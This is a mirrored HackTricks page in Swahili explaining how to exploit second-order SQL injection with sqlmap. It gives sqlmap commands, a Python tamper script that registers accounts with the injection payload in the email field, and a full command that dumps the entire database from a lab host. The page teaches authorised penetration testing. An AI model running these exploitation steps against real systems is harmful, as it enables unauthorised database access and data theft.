mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
74 lines
3.3 KiB
Markdown
74 lines
3.3 KiB
Markdown
{{#include ../../../banners/hacktricks-training.md}}
|
|
|
|
**SQLMap inaweza kutumia SQLis za Pili.**\
|
|
Unahitaji kutoa:
|
|
|
|
- **ombio** ambapo **payload ya sqlinjection** itahifadhiwa
|
|
- **ombio** ambapo **payload** itatekelezwa
|
|
|
|
Ombio ambapo payload ya SQL injection inahifadhiwa ni **imeonyeshwa kama katika injection nyingine yoyote katika sqlmap**. Ombio **ambapo sqlmap inaweza kusoma matokeo/utekelezaji** wa injection inaweza kuonyeshwa kwa `--second-url` au kwa `--second-req` ikiwa unahitaji kuonyesha ombio kamili kutoka kwa faili.
|
|
|
|
**Mfano rahisi wa pili:**
|
|
```bash
|
|
#Get the SQL payload execution with a GET to a url
|
|
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"
|
|
|
|
#Get the SQL payload execution sending a custom request from a file
|
|
sqlmap -r login.txt -p username --second-req details.txt
|
|
```
|
|
Katika kesi kadhaa **hii haitatosha** kwa sababu utahitaji **kufanya hatua nyingine** mbali na kutuma payload na kufikia ukurasa tofauti.
|
|
|
|
Wakati hii inahitajika unaweza kutumia **sqlmap tamper**. Kwa mfano, skripti ifuatayo itasajili mtumiaji mpya **kwa kutumia sqlmap payload kama barua pepe** na kutoka.
|
|
```python
|
|
#!/usr/bin/env python
|
|
|
|
import re
|
|
import requests
|
|
from lib.core.enums import PRIORITY
|
|
__priority__ = PRIORITY.NORMAL
|
|
|
|
def dependencies():
|
|
pass
|
|
|
|
def login_account(payload):
|
|
proxies = {'http':'http://127.0.0.1:8080'}
|
|
cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
|
|
|
|
params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
|
|
url = "http://10.10.10.10/create.php"
|
|
pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
|
|
|
|
url = "http://10.10.10.10/exit.php"
|
|
pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
|
|
|
|
def tamper(payload, **kwargs):
|
|
headers = kwargs.get("headers", {})
|
|
login_account(payload)
|
|
return payload
|
|
```
|
|
A **SQLMap tamper daima inatekelezwa kabla ya kuanza jaribio la kuingiza na payload** **na inapaswa kurudisha payload**. Katika kesi hii hatujali kuhusu payload lakini tunajali kuhusu kutuma maombi, hivyo payload haibadilishwi.
|
|
|
|
Hivyo, ikiwa kwa sababu fulani tunahitaji mtiririko wa hali ngumu zaidi ili kutumia kuingiza SQL ya pili kama:
|
|
|
|
- Unda akaunti yenye payload ya SQLi ndani ya uwanja wa "email"
|
|
- Toka
|
|
- Ingia na akaunti hiyo (login.txt)
|
|
- Tuma ombi kutekeleza kuingiza SQL (second.txt)
|
|
|
|
**Mstari huu wa sqlmap utasaidia:**
|
|
```bash
|
|
sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
|
|
##########
|
|
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
|
|
# -r login.txt : Indicates the request to send the SQLi payload
|
|
# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
|
|
# --second-req second.txt : Request to send to execute the SQLi and get the ouput
|
|
# --proxy http://127.0.0.1:8080 : Use this proxy
|
|
# --technique=U : Help sqlmap indicating the technique to use
|
|
# --dbms mysql : Help sqlmap indicating the dbms
|
|
# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
|
|
# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
|
|
# -a : Dump all
|
|
```
|
|
{{#include ../../../banners/hacktricks-training.md}}
|